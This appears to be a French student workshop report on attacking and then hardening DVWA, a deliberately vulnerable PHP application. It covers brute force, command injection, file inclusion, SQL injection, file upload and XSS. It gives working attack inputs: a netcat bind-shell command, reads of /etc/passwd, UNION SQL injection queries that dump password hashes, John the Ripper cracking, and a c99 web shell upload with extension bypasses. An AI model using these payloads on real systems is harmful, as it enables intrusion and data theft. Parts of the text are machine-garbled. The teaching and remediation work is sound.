Command Execution: File Inclusion : SQL injection :... 10
|
|
- Virgile Forget
- il y a 8 ans
- Total affichages :
Transcription
1 Web App Security CHEF ATELIER: BEN MARZOUK HAMZA(RT3) BOUJBEL AMEL(RT4) KHALIFI MAJDI(ISI) TOURJMEN HELA(RT3) ALIBI GHAZI(ISET) BEL HAJ HASSINE SOUHA(RT3) TRABELSI OUSSAMA(MPI)
2 Table des matières 1. Présentation de l atelier Présentation des outils utilisés... 3 a. Wamp... 3 b. DVWA... 3 c. Backtrack... 4 d. Bruter Topologie du réseau Configuration des outils... 7 Cas général :... 7 Brute Force :... 9 Command Execution : File Inclusion : SQL injection : Command Execution: File Upload : XSS stored : XSS reflected : Un scénario de test Brute force : Command Execution : File Inclusion : SQL injection : File Upload : XSS Reflected : XSS Stored : Conclusion
3 1. Présentation de l atelier L Atelier Web App Security représente l étude et le test des différentes vulnérabilités d une application Web vulnérable (DWVA) distante ou locale en vue de la sécuriser en suite contre ces failles. 2
4 2. Présentation des outils utilisés a. Wamp Web App Security SECURILIGHT 2014 WampServer est une plate-forme de développement Web non payante sous Windows pour des applications Web dynamiques à l aide du serveur Apache2, du langage de scripts PHP et d une base de données MySQL. Il possède également PHPMyAdmin pour gérer plus facilement vos bases de données. WampServer nous permet d installer et tester facilement l application DVWA et de la tester en local. WampServer a comme concurrents EasyPHP et VertrigoServ qui sont aussi non payants b. DVWA DVWA est conçu pour les développeurs qui souhaitent apprendre à protéger leurs applications web. Damn Vulnerable Web App (DVWA) est une application Web PHP/MySQL, qui est sacrément vulnérable. Son but est d'aider les professionnels de la sécurité à tester leurs outils dans un environnement légal, d'aider les développeurs à une meilleure compréhension du processus de sécurisation des applications web. 3
5 c. Backtrack BackTrack est une distribution Linux, basée sur Slackware jusqu'à la version 3 et Ubuntu depuis la version 4, apparue en Elle est née de la fusion de Whax et Auditor. Son objectif est de fournir une distribution regroupant l'ensemble des outils nécessaires aux tests de sécurité d'un réseau. Depuis 2013, Backtrack est devenu Kali Linux. BackTrack utilise KDE et GNOME (depuis la version 5 pour ce dernier), supporte plusieurs dispositions de clavier par simple clic (le français s'obtient en sept clics sur le drapeau de la barre KDE), et contient de nombreux outils permettant d'effectuer des tests de sécurité (près de 300). Elle vise à aborder tous les domaines liés aux sécurités modernes. De l'audit réseau à l'analyse et l'identification de vulnérabilité, BackTrack est reconnu par les professionnels de la sécurité informatique comme outil complet. 4
6 d. Bruter Bruter est un outil spécifique à l attaque brute force il sert à forcer l authentification à travers des connexions parallèles sur la victime en utilisant un dictionnaire de login et mots de pass. C est un outil gratuit sur Windows. Il existe d autres solutions similaires comme Cain & Abel. Interface de Bruter 5
7 3. Topologie du réseau Pour cet atelier on a seulement besoin d une machine fonctionnant avec Windows sur laquelle on a installé un WampServer pour faire fonctionner la DWVA ou une machine fonctionnant avec Backtrack vu que ce dernier intègre les services MySQL et apache 6
8 4. Configuration des outils Cas général : 1. Installation de WampServer : Télécharger WampServer : 2. Installation de DVWA : Télécharger DVWA : Déplacer le dossier de l application dans le répertoire /wamp/www/ Démarrer l application à partir du navigateur : Ouvrir dans le navigateur localhost Ouvrir l application DWVA localhost/dwva Se logger comme admin avec mot de pass password 7
9 8 Web App Security SECURILIGHT 2014
10 Brute Force : L outil Bruter nous permet de configurer les différents paramètres de l attaque Brute force sur une application web. Pour cela on doit récupérer ces paramètres grâce à un plugin installé sur le navigateur web Mozilla «En-têtes HTTP en direct» 9
11 Après cette configuration on pourra réaliser les attaques brute force et les tests. Command Execution : Pas de configuration supplémentaire nécessaire File Inclusion : Pas de configuration supplémentaire nécessaire SQL injection : Pas de configuration supplémentaire nécessaire Command Execution: Pas de configuration supplémentaire nécessaire File Upload : Pas de configuration supplémentaire nécessaire XSS stored : Pas de configuration supplémentaire nécessaire XSS reflected : Pas de configuration supplémentaire nécessaire 10
12 5. Un scénario de test Brute force : Cette méthode est en général considérée comme la plus simple concevable. Elle permet de casser tout mot de passe en un temps fini indépendamment de la protection utilisée, mais le temps augmente avec la longueur du mot de passe. En théorie la complexité d'une attaque par force brute est une fonction exponentielle de la longueur du mot de passe, la rendant virtuellement impossible pour des mots de passe de longueur moyenne, mais en pratique des optimisations heuristiques peuvent donner des résultats dans des délais beaucoup plus courts. Cette méthode est souvent combinée avec l'attaque par dictionnaire et par table arcen-ciel pour trouver le secret plus rapidement. Au niveau de l attaque nous avons déjà présenté la configuration de l outil avec lequel on va tester : Bruter. Après avoir préparé la configuration correspondante au niveau de sécurité de DVWA on lance l attaque : Niveau low : Et finalement on retrouve la combinaison dans 6 secondes Code du niveau low: 11
13 <?php if( isset( $_GET['Login'] ) ) { $user = $_GET['username']; $pass = $_GET['password']; $pass = md5($pass); $qry = "SELECT * FROM `users` WHERE user='$user' AND password='$p ass';"; $result = mysql_query( $qry ) or die( '<pre>'. mysql_error(). ' </pre>' ); </p>"; if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $i=0; // Bug fix. $avatar = mysql_result( $result, $i, "avatar" ); // Login Successful echo "<p>welcome to the password protected area ". $user. " echo '<img src="'. $avatar. '" />'; } else { //Login failed echo "<pre><br>username and/or password incorrect.</pre>"; } } mysql_close();?> On constate bien que ce code ne contient aucun contrôle et aucune sécurisation contre le bombardement de l application par brute force. Niveau medium : Dans ce niveau on remarque que la sécurisation ajoutée n a pas changé grande chose, elle a retardé d une seconde seulement la récupération de la combinaison. 12
14 Code du niveau Medium : <?php if( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $user = $_GET[ 'username' ]; $user = mysql_real_escape_string( $user ); // Sanitise password input $pass = $_GET[ 'password' ]; $pass = mysql_real_escape_string( $pass ); $pass = md5( $pass ); $qry = "SELECT * FROM `users` WHERE user='$user' AND password='$p ass';"; $result = mysql_query( $qry ) or die( '<pre>'. mysql_error(). ' </pre>' ); </p>"; if( $result && mysql_num_rows($result) == 1 ) { // Get users details $i=0; // Bug fix. $avatar = mysql_result( $result, $i, "avatar" ); // Login Successful echo "<p>welcome to the password protected area ". $user. " echo '<img src="'. $avatar. '" />'; } else { //Login failed echo "<pre><br>username and/or password incorrect.</pre>"; } } mysql_close();?> On constate que ce code contient un traitement sur le username et sur le password, ce genre de traitement sert principalement à ralentir la requête et ce afin d augmenter le temps de recherche du hacker. Niveau High : Dans le niveau high on remarque que ça change totalement, l application devient mieux protégée grâce à des modifications importantes. Résultat de l attaque : 13
15 On remarque que l attaque n a pas abouti à un résultat et s est bloquée Code du niveau High : <?php if( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $user = $_GET[ 'username' ]; $user = stripslashes( $user ); $user = mysql_real_escape_string( $user ); // Sanitise password input $pass = $_GET[ 'password' ]; $pass = stripslashes( $pass ); $pass = mysql_real_escape_string( $pass ); $pass = md5( $pass ); $qry = "SELECT * FROM `users` WHERE user='$user' AND password='$p ass';"; $result = mysql_query($qry) or die('<pre>'. mysql_error(). '</p re>' ); </p>"; if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $i=0; // Bug fix. $avatar = mysql_result( $result, $i, "avatar" ); // Login Successful echo "<p>welcome to the password protected area ". $user. " echo '<img src="'. $avatar. '" />'; } else { // Login failed sleep(3); echo "<pre><br>username and/or password incorrect.</pre>"; } } mysql_close();?> Le code du niveau high contient désormais à part un traitement consistant sur le username et mot de passe, un temps d attente après chaque authentification non acceptée, ce temps 14
16 d attente ralentit énormément voire même bloque l application malveillante qui essaie de forcer l opération. On pourra aussi proposer une solution alternative au niveau high en nous servant d une table dans laquelle on enregistre les utilisateurs suspects et on les bloque pendant une durée assez longue (une minute par exemple).aussi on ajoute ce qu on appelle «key stretching» In cryptography, key stretching refers to techniques used to make a possibly weak key, typically a password or passphrase, more secure against a brute force attack by increasing the time it takes to test each possible key. Passwords or passphrases created by humans are often short or predictable enough to allow password cracking. Key stretching makes such attacks more difficult. Wikipedia. Solution proposée: 15
17 Command Execution : L'une des vulnérabilités les plus critiques qu'un testeur peut rencontrer dans un test de demande de pénétration sur Internet est de trouver une application qu'il lui permettra d'exécuter taux de commandes. Le taux du système de cette vulnérabilité est élevé, car il peut permettre à tout utilisateur non autorisé et malveillants pour exécuter les commandes systèmes depuis l'application Web et pour récolter grande quantité d'informations ou de compromettre la machine cible. Nous allons voir comment nous pouvons exploiter cette vulnérabilité en utilisant l'application web vulnérable DVWA. LOW LEVEL: Comme nous pouvons le voir dans le DVWA nous avons un utilitaire de ping libre qui nous permet de faire un ping sur n importe quelle adresse IP. Afin de se assurer que l'application est vulnérable à commander l'exécution nous pouvons essayer une simple commande.dans le champ d'adresse IP, nous tapons 1 echo pentestlab.si pentestlab apparaît sur l'application Web après la soumission de la commande alors nous avons une exécution de la commande vulnérabilité. 16
18 Toujours dans les systèmes d'exploitation basés sur Linux, nous voulons afficher le contenu du fichier / etc / passwd parce que nous pouvons trouver des informations sur les utilisateurs. Nous pouvons également utiliser la commande suivante pour ouvrir un port sur l'hôte distant et de se reconnecter avec netcat. 1 netcat -v -e '/ bin / bash' -l -p Pourquoi l application est vulnérable? Nous pouvons répondre à cette question tout en examinant le code source 17
19 De le code ci-dessus, nous pouvons voir qu'il n'y a pas de contrôle pour la cible variable $target et elle correspond à une adresse IP ce qui permet à un attaquant d'ajouter commandes derrière l'adresse IP. Medium level À sécurité moyenne, DVWA rend un peu plus difficile par décapage à ces opérateurs familiers. Cependant, si nous alimentons une adresse IP qui ne répond pas à ICMP, il provoque ping pour revenir $?! = 0 moment idéal pour ajouter une double pipe -. ' ' à l'adresse. En faisant cela, nous pouvons diriger le shell pour exécuter la commande (s) vers la droite des tuyaux. Fond rapide - la double barre verticale indique au shell pour exécuter commande2 seulement si les rendements Command1 avec un échec: command1 commande2 Voici un exemple concret: sh-3.2 $ cat non_existent_file echo "Fichier non trouvé" cat: non_existent_file: Aucun fichier ou répertoire Fichier introuvable Alors que si nous utilisons '&&': sh-3.2 $ cat non_existent_file && echo "Fichier non trouvé" cat: non_existent_file: Aucun fichier ou répertoire Avis, la commande 'echo' ne sera pas exécutée. Le code de la sécurité medium level est : 18
20 High level Dans ce niveau,on ne peut pas exécuter les commandes linux. par exemple on veut exécuter la commande 1 cat /etc/ password La réponse sera : Donc l entrée doit ètre une adresse ip dans ce niveau de sécurité 19
21 La vulnérabilité de command exécution est annulée dans le High level grâce au contrôle sur la variable $target 20
22 File Inclusion : La faille à laquelle on s'intéresse est due à l'absence de contrôle sur le nom d'un fichier,qui peut être manipulé par l'utilisateur, qu'on essaye d'inclure dans le code source (en utilisant la fonction include();) Dans notre cas le nom du fichier va être récupéré a l'aide de la méthode $_GET[''],donc c'est ce qui apparait dont la barre d'adresse qui va être manipulé. Scenarios de test: Les fichiers qu'on va inclure seront de type texte (.txt) puisque notre but est d'exécuter le code qu'ils contiennent sur le serveur contenant la page vulnérable et non pas le nôtre. Exécution de commandes sur le serveur: On peut utiliser la fonction prédéfinie system(); qui permet d'exécuter des commandes sur le serveur. Afin de déterminer la commande à exécuter on peut utiliser la méthode $_GET[''] pour passer cette commande comme paramètre à la fonction. Notre code serait ainsi: Puis il ne nous reste que d'inclure le fichier contenant ce code et de passer la commande en paramètre à travers la barre d adresse, dans cet exemple on va utiliser une commande simple : la commande «help» Et le résultat de l'exécution de cette commande serait: 21
23 Collecte d'informations importantes: Informations sur la configuration de PHP sur le serveur utilisé: on peut obtenir ce type d'information en appelant la fonction prédéfinie "phpinfo();". Ainsi le code serait: Et le résultat serait l'apparition de plusieurs informations qui peuvent nous aider à avoir une idée sur d'autres types d'attaques peut-on performer : 22
24 On peut dans ce cas par exemple obtenir le chemin du fichier php.ini et on peut ainsi utiliser cette même faille pour le lire ou même le modifier (ce qui dépend des droits donnés aux utilisateurs par le serveur). Informations concernant le serveur : On peut utiliser le code si dessous pour afficher des informations sur le serveur dans un tableau : 23
25 Maintenant il ne nous reste que d'inclure le fichier dont on a ecrit ce code : Le code serait ainsi exécuter par le serveur et on obtient en fin le tableau suivant : Avoir accès a des fichier critiques: 24
26 A cause du fichier.htaccess quelques fichiers ou dossiers peuvent ne pas être accessible sauf si on présente l'identifient et le mot de passe correctes. C est pour cette raison que l'utilisation de cette vulnérabilité pour afficher le contenu des fichiers.htaccess et.htpasswd est considérer comme important et ceci pourrait être réalisé par l'utilisation de la fonction "show_source();",qui affiche le code source d'une page passée en paramètre. Le code de notre page serait ainsi: et on pourrait l'exploiter en insérant à chaque fois le nom ou le chemin vers le fichier qui nous intéresse. Appliquons ce teste sur le fichier "include.php": Utilisons cette même méthode pour des fichiers plus importants comme.htaccess 25
27 Contourner le problème propose dans le niveau medium: Dans ce niveau on peut toujours inclure des fichiers locaux comme le.htaccess.htpasswd Mais toute apparition de ou va être remplacée par une chaine vide ("") or comparer deux chaines revient à comparer les codes ascii de leurs caractères donc et par exemple, sont considérer différents, ce qui représente une solution pour ce cas. Remarque: Si le développeur essaye de nous forcer à inclure un fichier d'extension PHP alors qu'on s'intéresse a inclure des fichiers de type diffèrent on peut ajouter à la fin du nom du fichier ce qu'on appelle le «null byte» pour ignorer le reste de la chaine et par conséquent l'extension ajoutée dans le code source de la page.en effet la fonction include va être traitée par une fonction (entre autres) programmée en C, et en C le «null byte» signifie la fin de la chaine c'est pour cette raison que la partie qui suit(l'extension.php dans ce cas) va être ignorée. Solution: La solution est de contrôler le nom du fichier qui pourrait être donne ou modifier par l'utilisateur. On peut donc générer un code qui ne permet l'inclusion qu'aux pages qu'on détermine dans notre code dans ce cas ça serait la page "include.php" uniquement: 26
28 Si on essaye d'exploiter la faille: Désormais notre application n est plus vulnérable à ce type d attaque 27
29 SQL injection : Une injection SQL est un type d'exploitation d'une faille de sécurité d'une application interagissant avec une base de données, en injectant une requête SQL non prévue par le système et pouvant compromettre sa sécurité. Dans le cas de notre application on a 3 niveaux de sécurité : LOW LEVEL, MEDIUM LEVEL et HIGH LEVEL. LOW et MEDIUM LEVEL: 1-Test de vulnérabilité: Nous pouvons faire l'attaque à partir du zone de texte ci-dessous: Nous testons si notre application est vulnérable ou non: La page Web est censé imprimer ID, Prénom, Nom et à l'écran. Cette partie du code sera exploité et '$id' sera remplacer par 1. 28
30 2-Scénario toujours vrai pour afficher tous les utilisateurs: Maintenant cet partie du code sera exploité et '$id' sera remplacer par %' or '0'='0. 3-Version de la base de données: %' or 0=0 union select null, version() # Dans la dernière ligne affichée, est affichée dans SURNAME c'est la version de MYSQL database. 29
31 4-Afficher toutes les tables INFORMATION_SCHEMA: %' and 1=0 union select null, table_name from information_schema.tables # Maintenant, nous affichons toutes les tables de la base de données INFORMATION_SCHEMA. Le INFORMATION_SCHEMA est la base de données, l'endroit qui stocke des informations sur toutes les autres bases de données que le serveur MySQL entretient. 5-Afficher toutes les tables utilisateur de INFORMATION_SCHEMA: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# Maintenant, nous affichons toutes les tables qui commencent par le préfixe «user» dans la base de données INFORMATION_SCHEMA. 6-Afficher tous les champs de colonnes dans la table user de INFORMATION_SCHEMA: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # 30
32 Maintenant, nous affichons toutes les colonnes dans la table users. Il ya les colonnes user_id, first_name, last_name, user et Password 7-Afficher tous les contenus de champs de colonnes dans la table user de INFORMATION_SCHEMA: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # 31
33 Maintenant, nous avons réussi à montrer toutes les informations d'authentification nécessaires dans cette base de données. 8-Créer un hash de fichier: Nous créerons le fichier contenant les login et les mot de passe hachés séparées par ':' puis on l'enregistre dans '/pentest/passwords/john' sous le nom 'dvwa_password.txt'. Nous exécutons en suite les commandes suivantes: cd /pentest/passwords/john./john --format=raw-md5 dvwa_password.txt 32
34 Enfin, Nous avons réussi à afficher tous les mots de passe et nous pouvons maintenant connecter avec n'importe quel nom d'utilisateur. Solution: Ces attaques peuvent être évitées de plusieurs façons : Utiliser des procédures stockées, à la place du SQL dynamique. Les données entrées par l'utilisateur sont alors transmises comme paramètres, qui, s'ils sont correctement utilisés par la procédure (par exemple injectés dans une requête paramétrée), évitent l'injection. Vérifier de manière précise et exhaustive l'ensemble des données venant de l'utilisateur. On peut, par exemple, utiliser une expression rationnelle afin de valider qu'une donnée entrée par l'utilisateur est bien de la forme souhaitée, ou profiter de fonctions de transformation spécifiques au langage. Dans notre application nous allons appliquer des fonctions prédéfinies pour éviter toute sorte d'injection: stripslashes(paramètre); mysql_real_escape_string(paramètre); is_numeric(paramètre); Alors, notre code de l'application devient: 33
35 File Upload : De nos jours, de nombreux sites permettent d envoyer des fichiers sur leurs serveurs, pour les partager, les montrer a tout le monde. Ces services peuvent être très dangereux si ils ne sont pas bien protégés, car on propose à l utilisateur d envoyer des donnés sur le serveur. Et ils pourraient bien envoyer par exemple du code PHP contenant une Backdoor. 34
36 Exemple d exploit de la faille File Upload Dans ce cas de figure on va utiliser la sécurité basse de DVWA et on va uploader dans l application un fichier malveillant, il s agit d un shell php «c99». Avec la sécurité basse DWVA accepte tout type de fichier, on va voir après comment corriger cette faille. DVWA a bel et bien accepté notre fichier, maintenant passons aux choses intéressantes. On va maintenant utiliser notre fichier c99.php 35
37 Et hop : A travers ce Shell, on peut tout faire pour un serveur Unix. En d autres termes il nous permet de prendre le contrôle d un serveur. 36
38 Etude de la faille Maintenant venons au code de la faille : Commençons par le niveau low <?php if (isset($_post['upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $target_path. basename( $_FILES['uploaded ']['name']); if(!move_uploaded_file($_files['uploaded']['tmp_name'], $ target_path)) { } echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } else { echo '<pre>'; echo $target_path. ' succesfully uploaded!'; echo '</pre>';?> } On remarque bien que ce code ne contient aucun contrôle sur le fichier à uploader d où on peut uploader n importe quel fichier. 37
39 On passe maintenant au niveau medium <?php if (isset($_post['upload'])) { ]['name']); $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $target_path. basename($_files['uploaded' $uploaded_name = $_FILES['uploaded']['name']; $uploaded_type = $_FILES['uploaded']['type']; $uploaded_size = $_FILES['uploaded']['size']; )){ if (($uploaded_type == "image/jpeg") && ($uploaded_size < if(!move_uploaded_file($_files['uploaded']['tmp_name' ], $target_path)) { echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } else { echo '<pre>'; echo $target_path. ' succesfully uploaded!'; echo '</pre>';?> } } } else{ echo '<pre>your image was not uploaded.</pre>'; } À ce niveau, on remarque le code contient désormais deux contrôles sur le fichier ; un contrôle sur le type et un second sur la taille. Mais cela reste insuffisant car on peut renommer le fichier et ajouter une extension image 38
40 On voit bien que l application n accepte pas le fichier Mais si on renomme le fichier comme suit shell.php.jpeg 39
41 Sachant que l extension n a pas d importance dans un système Unix, cette faille reste dangereuse d où il faut ajouter d autres contrôles. 40
42 Au niveau high : <?php if (isset($_post['upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $target_path. basename($_files['uploaded' ]['name']); $uploaded_name = $_FILES['uploaded']['name']; $uploaded_ext = substr($uploaded_name, strrpos($uploaded_ name, '.') + 1); $uploaded_size = $_FILES['uploaded']['size']; if (($uploaded_ext == "jpg" $uploaded_ext == "JPG" $uploaded_ext == "jpeg" $uploaded_ext == "JPEG") && ($uploaded_siz e < )){ if(!move_uploaded_file($_files['uploaded']['tmp_name' ], $target_path)) { echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } else { echo '<pre>'; echo $target_path. ' succesfully uploaded!'; echo '</pre>'; } } else{ echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } }?> On remarque ici l utilisation d un contrôle sur l extension mais ceci reste toujours vulnérable à l ajout d une extension que l application accepte Par exemple shell2.php.jpeg 41
43 Pour remédier à cette faille on doit tester sur des paramètres spécifiques au type image comme hauteur et largeur Pour cela on utilise la fonction php getimagesize() Alors le code devient : <?php if (isset($_post['upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $target_path. basename($_files['uploaded' ]['name']); $uploaded_name = $_FILES['uploaded']['name']; $uploaded_ext = substr($uploaded_name, strrpos($uploaded_ name, '.') + 1); $uploaded_size = $_FILES['uploaded']['size']; list($width, $height, $type, $attr) ES['uploaded']['tmp_name']); if (($uploaded_ext == "jpg" $uploaded_ext == "JPG" $uploaded_ext == "jpeg" $uploaded_ext == "JPEG") && ($uploaded_siz e < ) && ($width > 1) &&($height > 1)) { 42
44 if(!move_uploaded_file($_files['uploaded']['tmp_name' ], $target_path)) { echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } else { echo '<pre>'; echo $target_path. ' succesfully uploaded!'; echo '</pre>'; } } else{ echo '<pre>'; echo 'Your image was not uploaded.'; echo '</pre>'; } }?> Et voilà le test : Et finalement: Notre application est maintenant plus résistante à ce type d attaque Conclusion 43
45 Grace à cette étude, on a pu voir comment exploiter la faille de notre application et la protéger contre cette attaque très souvent utilisée par les hackers car elle permet de prendre totalement le contrôle de la cible. XSS Reflected : Introduction : Le cross-site scripting (abrégé XSS), est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, permettant ainsi de provoquer des actions sur les navigateurs web visitant la page. Les possibilités des XSS sont très larges puisque l'attaquant peut utiliser tous les langages pris en charge par le navigateur (JavaScript, Java, Flash...) et de nouvelles possibilités sont régulièrement découvertes notamment avec l'arrivée de nouvelles technologies comme HTML5. Il est par exemple possible de rediriger vers un autre site pour du hameçonnage ou encore de voler la session en récupérant les cookies. 44
46 Ce type de faille de sécurité apparait lorsque des données fournies par un client web sont utilisées telles quelles par les scripts du serveur pour produire une page de résultats. Si les données non vérifiées sont incluses dans la page de résultat sans encodage des entités HTML, elles pourront être utilisées pour injecter du code dans la page dynamique reçue par le navigateur client. 1. Low level : Comme nous pouvons le voir dans le DVWA, il y a une zone de texte qui a comme paramètre d entée une chaine de caractère, elle retourne un message «hello nom_saisie». Afin de tester que l application est vulnérable, on va injecter un simple code HTML dans cette zone de texte. Après exécution, le mot ghazi sera en gras et en italique. Ceci Ceci est un simple exemple, mais avec des codes plus complexe et dangereux, l'attaquant peut : - voler des informations d'identification dans les cookies non-httponly. - envoyer des requêtes à un serveur avec les informations d'identification de l'utilisateur. - voler des secrets qui sont stockés dans les variables JavaScript. - -inviter l'utilisateur à télécharger du contenu en soumettant un formulaire. - rediriger vers un autre site. - obtenir des données GPS / appareil photo si l'utilisateur a accordé que l'accès du site à l'appareil. Exemple du code qui permet de changer les liens dans les balises <a></a> avec un lien malveillant. 45
47 Exemple du code qui permet de d intercepter les cookies d un utilisateur et les envoie à son serveur. Ce problème existe puisque il n a pas de contrôle sur le champ de saisie. 2. medium level : Dans ce niveau, on ajoute une fonction dans le langage PHP : le «str_remplace». Elle permet de faire un filtre dans la saisie. Tout balise commencent par «<script>» sera remplacer par une chaine vide. Il existe plusieurs mécanismes disponibles pour les développeurs pour dépasser ce filtre, tels que de renvoyer une erreur, en supprimant, encodage, ou de remplacer une entrée invalide. Le moyen par lequel l'application détecte et corrige les entrées invalides est une autre faiblesse dans la prévention primaire XSS. Dans certains cas, il est possible que les filtres basés sur les signatures puissent être simplement défaits par obscurcir l'attaque. Typiquement, vous pouvez le faire grâce à l'insertion de variations inattendues dans la syntaxe. Ces variations sont tolérées par les navigateurs HTML valide que lorsque le code est retourné, et pourtant, ils pourraient également être acceptées par le filtre. 46
48 Pour sécuriser l application, plusieurs techniques permettent d'éviter le XSS: - utiliser la fonction htmlspecialchars() qui filtre les '<' et '>' (cf. ci-dessus) ; - utiliser la fonction htmlentities() qui est identique à htmlspecialchars() sauf qu'elle filtre tous les caractères équivalents au codage HTML ou JavaScript. - utiliser strip_tags() qui supprime les balises. 3. High level : Apres la modification du code, on a ajouté htmlspecialchars()qui filtre les caractères spécial. C est la mode la plus sécurisé. 47
49 XSS Stored : Le cross-site scripting est abrégé XSS pour ne pas être confondu avec le CSS (feuilles de style) 1, X se lisant «cross» (croix) en anglais. Les failles XSS sont très répandues sur Internet, et utilisées dans de nombreuses attaques aujourd hui. Le principe est d'injecter des données arbitraires dans un site web, par exemple en déposant un message dans un forum, ou par des paramètres d'url. Si ces données arrivent telles quelles dans la page web transmise au navigateur (par les paramètres d'url, un message posté ) sans avoir été vérifiées, alors il existe une faille : on peut s'en servir pour faire exécuter du code malveillant en langage de script (du JavaScript le plus souvent) par le navigateur web qui consulte cette page. XSS Stored Ce type de vulnérabilité, aussi appelé faille permanente ou du second ordre permet des attaques puissantes. Elle se produit quand les données fournies par un utilisateur sont stockées sur un serveur (dans une base de données, des fichiers, ou autre), et ensuite réaffichées sans que les caractères spéciaux HTML aient été encodés. Low Level : Ici nous avons 2 champs qui permettent de laisser des messages et d indiquer son nom d utilisateur. On va tenter une XSS simple pour commencer (insérer du code Javascript qui sera interprété par le navigateur afin d afficher une boite de dialogue Javascript) On tape dans la case : «Name» : n importe quel nom 48
Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)
Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Sommaire : Contenu I. Introduction:... 2 II. Présentation de l atelier :... 2 1) Attaque persistante :... 3 2) Attaque non persistante :...
Plus en détailSécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin
Sécurité des sites Web Pas un cours un recueil du net INF340 Jean-François Berdjugin Vulnérabilité Définition (wikipédia) : Dans le domaine de la sécurité informatique, une vulnérabilité est une faiblesse
Plus en détailcedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007
A t t a q u e s c o n t r e l e s a p p l i s w e b cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 D e l ' u t i l i t é d e l ' a t t a
Plus en détailPrincipales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement
Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.
Plus en détailDOSSIER D'ACTIVITES SUR LE PHP N 03 Créer une base de données MySQL avec PHPMyAdmin
DOSSIER D'ACTIVITES SUR LE PHP N 03 Créer une base de données MySQL avec PHPMyAdmin Objectifs : Apprendre à l apprenant à lancer un serveur local «Apache» Apprendre à l'apprenant à lancer un serveur MySQL
Plus en détailPHP et mysql. Code: php_mysql. Olivier Clavel - Daniel K. Schneider - Patrick Jermann - Vivian Synteta Version: 0.9 (modifié le 13/3/01 par VS)
PHP et mysql php_mysql PHP et mysql Code: php_mysql Originaux url: http://tecfa.unige.ch/guides/tie/html/php-mysql/php-mysql.html url: http://tecfa.unige.ch/guides/tie/pdf/files/php-mysql.pdf Auteurs et
Plus en détailOWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI
OWASP Open Web Application Security Project Jean-Marc Robert Génie logiciel et des TI A1: Injection Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est
Plus en détailCréation d'un site dynamique en PHP avec Dreamweaver et MySQL
Création d'un site dynamique en PHP avec Dreamweaver et MySQL 1. Création et configuration du site 1.1. Configuration de Dreamweaver Avant de commencer, il est nécessaire de connaître l'emplacement du
Plus en détailFailles XSS : Principes, Catégories Démonstrations, Contre mesures
HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Séminaire 15 ans HSC Failles XSS : Principes, Catégories Démonstrations,
Plus en détailOUAPI Guide d installation Outil d administration de parc informatique. Documentation d installation et de paramétrage
Outil d administration de parc informatique Documentation d installation et de paramétrage Nicolas BIDET Ouapi.org 29/07/2012 Sommaire Installation de Wampserver... 3 1.1. Téléchargement de WampServer...
Plus en détailInstallation locale de JOOMLA SEPIA
FOAD TICE Installation locale de JOOMLA SEPIA Académie de Reims FRANÇOIS PALLUT Paternité - Pas d'utilisation Commerciale - Partage des Conditions Initiales à l'identique : http://creativecommons.org/licenses/by-nc-sa/2.0/fr/
Plus en détailStockage du fichier dans une table mysql:
Stockage de fichiers dans des tables MYSQL avec PHP Rédacteur: Alain Messin CNRS UMS 2202 Admin06 30/06/2006 Le but de ce document est de donner les principes de manipulation de fichiers dans une table
Plus en détailFORMATION PcVue. Mise en œuvre de WEBVUE. Journées de formation au logiciel de supervision PcVue 8.1. Lieu : Lycée Pablo Neruda Saint Martin d hères
FORMATION PcVue Mise en œuvre de WEBVUE Journées de formation au logiciel de supervision PcVue 8.1 Lieu : Lycée Pablo Neruda Saint Martin d hères Centre ressource Génie Electrique Intervenant : Enseignant
Plus en détailAttaques de type. Brandon Petty
Attaques de type injection HTML Brandon Petty Article publié dans le numéro 1/2004 du magazine Hakin9 Tous droits reservés. La copie et la diffusion de l'article sont admises à condition de garder sa forme
Plus en détailPHP 5.4 Développez un site web dynamique et interactif
Editions ENI PHP 5.4 Développez un site web dynamique et interactif Collection Ressources Informatiques Table des matières Table des matières 1 Chapitre 1 Introduction 1. Objectif de l'ouvrage.............................................
Plus en détail1/ Introduction. 2/ Schéma du réseau
1/ Introduction FWBuilder est un logiciel-libre multi-plateforme qui permet de créer ses propres pare-feux et les utiliser sur différents SE ou sur du matériel informatique. Objectif : Créer un pare-feu
Plus en détailManuel de l'utilisateur d'intego VirusBarrier Express et VirusBarrier Plus
Manuel de l'utilisateur d'intego VirusBarrier Express et VirusBarrier Plus Bienvenue dans le manuel de l'utilisateur d'intego VirusBarrier Express et VirusBarrier Plus. VirusBarrier Express est un outil
Plus en détail\ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( <_> ) \ / /\ _ / \ / / \/ \/ \/ Team
